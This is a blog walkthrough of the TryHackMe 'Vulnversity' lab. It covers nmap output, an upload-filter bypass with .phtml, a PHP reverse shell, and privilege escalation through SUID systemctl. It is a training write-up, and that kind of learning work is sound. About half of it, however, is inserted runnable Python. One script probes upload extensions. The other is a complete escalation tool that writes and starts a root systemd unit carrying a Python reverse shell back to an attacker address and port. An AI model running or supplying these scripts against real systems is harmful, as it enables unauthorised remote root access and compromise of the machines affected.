Tips for an Information Security Analyst/Pentester career - Ep. 84 - TryHackMe

TryHackMe is a website where you can legally and safely practice pentesting and hacking.
You can choose between paid and free activities on the site.
It hosts a series of "rooms" where you learn either by following a specific learning path (e.g. Linux privilege escalation) or by playing CTFs.
Compared with Hack The Box it is more beginner-friendly, and for each room, whether free or premium, you can usually find community-written write-ups if you get stuck.
I recently solved a room called Vulnversity.
Here's the walkthrough.





To play, you download an OpenVPN configuration file (.ovpn) from the site and use it to connect to the lab network.
For more detailed instructions, check the Access page.
Once connected, you receive an internal IP address on the VPN and can reach the target machine.

INITIAL RECON: nmap -sS -sV -p- --open -T4 -vv <MACHINE IP>
PORT     STATE SERVICE     REASON         VERSION
21/tcp   open  ftp         syn-ack ttl 63 vsftpd 3.0.3
22/tcp   open  ssh         syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
139/tcp  open  netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn syn-ack ttl 63 Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3128/tcp open  http-proxy  syn-ack ttl 63 Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
3333/tcp open  http        syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-title: Vuln University
No exact OS matches for host.
Uptime guess: 198.840 days (since Wed Sep 11 02:15:18 2019)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h20m00s, deviation: 2h18m34s, median: 0s
| nbstat: NetBIOS name: VULNUNIVERSITY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   VULNUNIVERSITY<00>   Flags: <unique><active>
|   VULNUNIVERSITY<03>   Flags: <unique><active>
|   VULNUNIVERSITY<20>   Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
| Statistics:
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_  00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 41203/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 45735/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 56253/udp): CLEAN (Failed to receive data)
|   Check 4 (port 32651/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: vulnuniversity
|   NetBIOS computer name: VULNUNIVERSITY\x00
|   Domain name: \x00
|   FQDN: vulnuniversity
|_  System time: 2020-03-27T22:25:24-04:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-03-28T02:25:24
|_  start_date: N/A
TRACEROUTE (using port 445/tcp)
HOP RTT       ADDRESS
1   138.04 ms 10.8.0.1
2   138.24 ms 10.10.10.202
Nmap done: 1 IP address (1 host up) scanned in 85.44 seconds
Raw packets sent: 73874 (3.254MB) | Rcvd: 73628 (2.969MB)

FINDINGS
The web server is running on port 3333.
Let's do some recon and brute-force its directories.

Using dirsearch, I found an upload directory (/internal).
The room gives hints about which extensions might be allowed, but we can also work that out ourselves with Burp Intruder: send the upload request to Intruder, mark the file extension as the payload position, load a list of candidate extensions (.php, .php3, .php4, .php5, .phtml, .phar, ...) and compare the responses; the upload whose response differs from the "not allowed" ones is the accepted extension.



After running the attack through Intruder (see the embedded video), we conclude that the .phtml extension is allowed.

We can then upload a PHP reverse shell after renaming it from .php to .phtml.


We then obtain a reverse shell from the target by browsing to the URL of the uploaded file on the web server, with a netcat listener waiting on the port configured in the shell.
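The extension check and the upload step above, re-created as a small Python probe. This is an added example, not the author's Intruder session or anything from the room: it uploads a harmless file under each candidate extension and reports which ones the server accepted. The upload URL, the form field name ("file"), the success marker in the response and the mock server's blocklist are all assumptions standing in for the real target; the mock only exists so the script runs offline.

```python
"""Probe which file extensions an upload form accepts.

Added example: this re-creates the Burp Intruder check in Python and is not
the author's Intruder session. The upload URL, form field name, the success
marker and the mock server's blocklist are assumptions standing in for the
real target.
"""
import threading
import urllib.request
import uuid
from http.server import BaseHTTPRequestHandler, HTTPServer

# Extensions a PHP-enabled Apache may still execute when plain ".php" is blocked.
CANDIDATES = [".php", ".php3", ".php4", ".php5", ".phtml", ".phar", ".txt"]


def build_multipart(field, filename, content, boundary):
    """Encode one file as a multipart/form-data body; returns (body, content_type)."""
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        "Content-Type: application/octet-stream\r\n\r\n"
    ).encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return head + content + tail, f"multipart/form-data; boundary={boundary}"


def probe_extensions(url, field="file", candidates=CANDIDATES, marker="Success"):
    """Upload a harmless file under each candidate extension and return the
    extensions whose response carries the success marker (in Intruder these
    show up as the responses with a different length)."""
    allowed = []
    for ext in candidates:
        body, ctype = build_multipart(field, "probe" + ext, b"probe", uuid.uuid4().hex)
        req = urllib.request.Request(url, data=body, method="POST")
        req.add_header("Content-Type", ctype)
        with urllib.request.urlopen(req, timeout=10) as resp:
            if marker in resp.read().decode(errors="replace"):
                allowed.append(ext)
    return allowed


class MockUploadHandler(BaseHTTPRequestHandler):
    """Constructed stand-in for the target's upload script: it rejects by a
    blocklist that forgets .phtml, which is exactly the gap Intruder finds."""
    BLOCKED = (".php", ".php3", ".php4", ".php5", ".phar")  # assumed blocklist

    def do_POST(self):
        raw = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        filename = raw.decode(errors="replace").split('filename="', 1)[1].split('"', 1)[0]
        msg = b"Extension not allowed" if filename.lower().endswith(self.BLOCKED) else b"Success"
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(msg)))
        self.end_headers()
        self.wfile.write(msg)

    def log_message(self, *args):  # keep the demo output quiet
        pass


def run_against_mock():
    """Spin up the mock on a free localhost port, probe it, shut it down."""
    server = HTTPServer(("127.0.0.1", 0), MockUploadHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return probe_extensions(f"http://127.0.0.1:{server.server_address[1]}/internal/index.php")
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print("accepted by the mock:", run_against_mock())
    # Against the real room you would call, with the marker the real page returns:
    # probe_extensions("http://<MACHINE IP>:3333/internal/index.php", marker="...")
```

Against the mock the probe returns [".phtml", ".txt"]: the blocklist catches every PHP spelling except .phtml, and Apache with mod_php typically maps .phtml to the PHP handler too, which is why renaming the shell works. Run it with a listener ready and the same marker the real upload page returns on success.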


Looking at /etc/passwd, we find that a user called bill is also configured on the machine. We can enter his home directory, which contains our first flag (user.txt), a world-readable file.

PRIVILEGE ESCALATION 

Looking for SUID files (with the command below), we find that systemctl has the SUID bit set and can be used for privesc.

It stands out because systemctl manages systemd services: it can register a unit file and start it, and a service started this way runs as root unless the unit says otherwise.

Following the directions found here, we can create a fake service that returns a root reverse shell on port 9000.
The technique leverages the fact that systemctl lets us enable and start a service of our choosing. Since the binary is SUID root, it runs with root privileges whatever user invokes it, so the service it starts for us runs as root and hands us a root shell.
This is what the fake service looks like:
NOTE: Compared with the referenced post, I made two changes: 
  • I replaced the bash payload with a python payload (the bash shell mentioned in the original post didn't work) 
  • I replaced the attacking machine's IP address with my internal IP for the TryHackMe network.

I then registered the service with systemctl enable /tmp/root.service.


The command creates a unit called root.service that, once started, sends a root shell back to our machine.
To start it we run systemctl start root (the unit name, not the file path).
With a netcat listener waiting on port 9000, we receive a root reverse shell.
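The whole privilege escalation procedure above (find SUID binaries, spot the dangerous one, write a unit file carrying a Python reverse shell, enable and start it), as an added example in Python. This is not the author's command or unit file and not the referenced post's service; it is the same technique written out so the pieces are visible. It assumes the attacker's VPN address and listener port (LHOST/LPORT), a Python interpreter at /usr/bin/python3 on the target, and /tmp/root.service as the unit path; all of these are parameters. The self-check builds a scratch directory with a fake SUID file so the finder can be exercised without touching the real system.

```python
"""SUID hunt and SUID-systemctl privilege escalation helper.

Added example, not the author's commands or unit file. It assumes the
attacker's VPN address and listener port (LHOST/LPORT), a Python interpreter
at /usr/bin/python3 on the target, and /tmp/root.service as the unit path;
all four are parameters below.
"""
import os
import stat
import subprocess
import tempfile

# Binaries GTFOBins lists as usable for escalation when they are SUID root (excerpt).
KNOWN_ESCALATORS = {"systemctl", "bash", "find", "vim", "python", "python3",
                    "perl", "nmap", "env", "cp"}


def find_suid(root="/"):
    """Equivalent of `find / -type f -perm -4000 2>/dev/null`: regular files with the setuid bit."""
    hits = []
    for dirpath, _dirs, files in os.walk(root, onerror=lambda err: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                mode = os.lstat(path).st_mode
            except OSError:
                continue
            if stat.S_ISREG(mode) and mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def flag_known(paths):
    """Keep only the SUID files whose name is on the known-escalator list."""
    return [p for p in paths if os.path.basename(p) in KNOWN_ESCALATORS]


def render_unit(lhost, lport, python="/usr/bin/python3"):
    """Unit file whose ExecStart is a Python reverse shell to lhost:lport.
    systemd runs it as root because no User= is set; Type=oneshot keeps
    `systemctl start` attached until the shell exits."""
    payload = (
        "import socket,subprocess,os;s=socket.socket();"
        f's.connect(("{lhost}",{lport}));'
        "[os.dup2(s.fileno(),fd) for fd in (0,1,2)];"
        'subprocess.call(["/bin/sh","-i"])'
    )
    return (
        "[Unit]\nDescription=root shell\n\n"
        "[Service]\nType=oneshot\n"
        f"ExecStart={python} -c '{payload}'\n\n"
        "[Install]\nWantedBy=multi-user.target\n"
    )


def escalate(lhost, lport, unit_path="/tmp/root.service", systemctl="systemctl"):
    """Write the unit, register it, start it. Start `nc -lvnp <lport>` on the attacker first."""
    with open(unit_path, "w") as fh:
        fh.write(render_unit(lhost, lport))
    subprocess.run([systemctl, "enable", unit_path], check=True)     # links root.service
    subprocess.run([systemctl, "start", "root.service"], check=True)  # unit name, not the path


def self_check():
    """Constructed scratch directory: one fake SUID 'systemctl', one plain 'ls'."""
    scratch = tempfile.mkdtemp()
    fake = os.path.join(scratch, "systemctl")
    plain = os.path.join(scratch, "ls")
    for path, mode in ((fake, 0o4755), (plain, 0o755)):
        open(path, "w").close()
        os.chmod(path, mode)
    found = find_suid(scratch)
    return found == [fake] and flag_known(found) == [fake]


if __name__ == "__main__":
    print("self-check:", self_check())
    print("candidates on this box:", flag_known(find_suid("/")))
    # On the target, with a listener up: escalate("10.8.0.5", 9000)  # placeholder LHOST/LPORT
```

Two details worth noting: `systemctl enable` takes the absolute path and registers the unit under its file name, so the later `start` uses `root.service`, and the [Install] section is there because enable refuses units without one. The reverse-shell payload uses the Python interpreter because, as noted above, the bash variant from the referenced post did not work on this box.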



At that point we can read the root flag: the machine is pwned.



 GAME OVER!!

Hope you enjoyed the walkthrough and the ride.
Stick around for more posts
